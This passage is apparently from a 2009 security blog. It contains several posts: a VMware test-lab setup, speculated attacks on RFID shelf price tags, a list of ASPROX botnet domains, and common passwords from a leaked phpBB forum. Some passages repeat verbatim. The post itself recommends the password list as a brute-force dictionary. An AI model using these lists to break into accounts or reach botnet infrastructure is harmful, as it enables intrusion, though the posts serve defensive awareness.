The second bridge is the network appliance itself! If it is an inline bridge device like our IPS, then it will bridge the already bridged interface to the private NAT network which VMware created automatically. The auto NAT network is usually some derivative of 192.168.1xx.x which likely won't clobber your normal LAN.
Ok... so that seems like the perfect setup and it has worked rock solid for us requiring only one Windows machine with VMware, one actual real network interface and 2+ gig's of RAM. Pretty easy to come by these days.
Why do we want a new setup? Well I had to splurge on a Macbook Pro last year and VMware fusion does not support teaming.... Seem like small potatoes but it kills me that I can't put my 4 gigs or ram to good use. Yes my drive is encrypted :)
*** Update: maybe time to try Convirt 1.0 on my Mac
Labels:
network appliance,
osx,
QA,
Sentinel IPS,
virtualization,
vmware,
vmware fusion
Tuesday, March 3, 2009
Whole Foods RFID price tag security
A brand new Whole Foods opened up right next to our house so I had to check it out on opening day. What a nightmare of triple parked Prius', scooters and other granola eating eco-hipsters transportation devices. I'm not an anti-hippy but my love for red meat, beer and Marlboro lights is not so popular with that crowd. Anyways throughout the dozens of free yummy samples I happened to notice new digital price tags under the food. Well they are not connected to any physical wires and looks to be powered off watch batteries, must be RFID! A little bit of googleing confirmed my theory and we are off to the races.
Potential security issues:
Price modification (Choice Ribeye steak for $2/pound)
Customer product tracking
Store pricing denial of service (eggs and toilet paper now $99, maybe too believable at whole foods)
Price change sniffers (publish sale items on rss feed, hide behind the cantaloupe)
I would like to hear your ideas, thoughts, comments on this change which will likely ripple down to other big box grocers in the future.
Potential security issues:
Price modification (Choice Ribeye steak for $2/pound)
Customer product tracking
Store pricing denial of service (eggs and toilet paper now $99, maybe too believable at whole foods)
Price change sniffers (publish sale items on rss feed, hide behind the cantaloupe)
I would like to hear your ideas, thoughts, comments on this change which will likely ripple down to other big box grocers in the future.
Labels:
Digital Price Tags,
RFID,
RFID Security,
Whole Foods
Tuesday, February 10, 2009
ASPROX Back with a vengance
So the SQL Injection attacks have slowed down a bit but the botnet is still very much alive and is now back running large scale phishing and money mule scams designed to prey on jobless Americans.
Please read or watch the amazing ASPROX report by Dennis Brown @ Verisign given at Toorcon on the latest on ASPROX anatomy.
If you or your organization's website are a victim of ASPROX please see our highly popular ASPROX Toolkit with recommendations on defense and post compromise remediation.
Known currently active ASPROX domains:
dbrgf.ru
lijg.ru
bnmd.kz
nvepe.ru
mtno.ru
wmpd.ru
msngk6.ru
dft6s.kz
47mode.name
berjke.ru
81dns.ru
53refer.ru
chk06.ru
driver95.ru
errghr.ru
lang42.ru
netcfg9.ru
sitevgb.ru
vrelel.ru
30area.ru
4log-in.ru
advabnr.com
Also being reported at:
http://www.matchent.com/wpress/?q=node/432
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090122
Please read or watch the amazing ASPROX report by Dennis Brown @ Verisign given at Toorcon on the latest on ASPROX anatomy.
If you or your organization's website are a victim of ASPROX please see our highly popular ASPROX Toolkit with recommendations on defense and post compromise remediation.
Known currently active ASPROX domains:
dbrgf.ru
lijg.ru
bnmd.kz
nvepe.ru
mtno.ru
wmpd.ru
msngk6.ru
dft6s.kz
47mode.name
berjke.ru
81dns.ru
53refer.ru
chk06.ru
driver95.ru
errghr.ru
lang42.ru
netcfg9.ru
sitevgb.ru
vrelel.ru
30area.ru
4log-in.ru
advabnr.com
Also being reported at:
http://www.matchent.com/wpress/?q=node/432
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090122
Forum Compromise gives insight into password security
A large programing forum (PHPBB) was recently hacked and 20,000 account passwords were posted online and in plain text by the attacker. Like last years Myspace account hack the was an excellent mining tool for security researchers to analyze common passwords and average password strength.
Here are the most commonly used passwords, notice #2 matched the forum name of PHBB. Other interesting weak passwords of note as the permutations of 123456 and the always popular "letmein" and "qwerty". This list is also probably a great source for a brute force dictionary on pen-testing.
3.03% "123456"
2.13% "password"
1.45% "phpbb"
0.91% "qwerty"
0.82% "12345"
0.59% "12345678"
0.58% "letmein"
0.53% "1234"
0.50% "test"
0.43% "123"
0.36% "trustno1"
0.33% "dragon"
0.31% "abc123"
0.31% "123456789"
0.31% "111111"
0.30% "hello"
0.30% "monkey"
0.28% "master"
0.22% "killer"
0.22% "123123"
Here are the most commonly used passwords, notice #2 matched the forum name of PHBB. Other interesting weak passwords of note as the permutations of 123456 and the always popular "letmein" and "qwerty". This list is also probably a great source for a brute force dictionary on pen-testing.
3.03% "123456"
2.13% "password"
1.45% "phpbb"
0.91% "qwerty"
0.82% "12345"
0.59% "12345678"
0.58% "letmein"
0.53% "1234"
0.50% "test"
0.43% "123"
0.36% "trustno1"
0.33% "dragon"
0.31% "abc123"
0.31% "123456789"
0.31% "111111"
0.30% "hello"
0.30% "monkey"
0.28% "master"
0.22% "killer"
0.22% "123123"
Subscribe to:
Posts (Atom)